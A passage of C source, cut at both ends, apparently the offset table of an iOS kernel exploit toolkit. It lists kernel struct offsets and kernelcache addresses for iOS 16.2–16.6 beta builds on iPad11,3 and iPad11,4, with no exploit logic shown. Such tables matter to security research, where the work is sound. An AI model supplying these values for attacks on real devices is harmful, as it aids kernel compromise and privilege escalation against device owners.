0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2f1288, .kernelcache__gPhysBase = 0xfffffff0078f80e0, .kernelcache__gPhysSize = 0xfffffff0078f80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f62b8, .kernelcache__perfmon_devices = 0xfffffff00a32f500, .kernelcache__perfmon_dev_open = 0xfffffff007ea9c8c, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a32e990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a32e988, .kernelcache__vn_kqfilter = 0xfffffff007ef8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Air 3 // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a225178, .kernelcache__gPhysBase = 0xfffffff00781bc60, .kernelcache__gPhysSize = 0xfffffff00781bc60 + 8, .kernelcache__gVirtBase = 0xfffffff007819e40, .kernelcache__perfmon_devices = 0xfffffff00a260380, .kernelcache__perfmon_dev_open = 0xfffffff007e873ac, .kernelcache__ptov_table = 0xfffffff0077cf248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a25f800, .kernelcache__vm_pages = 0xfffffff0077cc080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a25f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ed9a44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2f1288, .kernelcache__gPhysBase = 0xfffffff0078f80e0, .kernelcache__gPhysSize = 0xfffffff0078f80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f62b8, .kernelcache__perfmon_devices = 0xfffffff00a32f500, .kernelcache__perfmon_dev_open = 0xfffffff007ea9c8c, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a32e990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a32e988, .kernelcache__vn_kqfilter = 0xfffffff007ef8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 